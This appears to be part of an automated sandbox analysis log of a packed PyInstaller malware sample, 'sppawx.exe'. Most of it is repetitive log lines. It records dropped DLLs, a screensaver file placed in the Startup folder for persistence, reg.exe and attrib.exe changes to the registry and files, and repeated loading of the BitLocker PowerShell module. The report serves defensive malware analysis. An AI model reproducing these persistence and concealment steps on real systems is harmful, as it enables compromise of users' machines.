Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7B3600BD pushad ; iretd	11_2_00007FFE7B3600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7B368678 push ebx; ret	11_2_00007FFE7B3686CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFE7B36861B push ebx; ret	11_2_00007FFE7B36862A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 68_2_00007FFE7CAA00BD pushad ; iretd	68_2_00007FFE7CAA00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 68_2_00007FFE7CAA3DF2 push esi; retf	68_2_00007FFE7CAA3DFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 68_2_00007FFE7CAA3DD1 push edx; retf	68_2_00007FFE7CAA3DD2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 68_2_00007FFE7CAA3DFF push esi; retf	68_2_00007FFE7CAA3DFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 68_2_00007FFE7CAA3299 push es; retf	68_2_00007FFE7CAA329A

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\sppawx.exe

Process created: "C:\Users\user\Desktop\sppawx.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\select.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sppawx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe	Jump to dropped file

Source: C:\Users\user\Desktop\sppawx.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Jump to behavior

Source: C:\Users\user\Desktop\sppawx.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\sppawx.exe

Code function: 0_2_00007FF79A315820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF79A315820

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
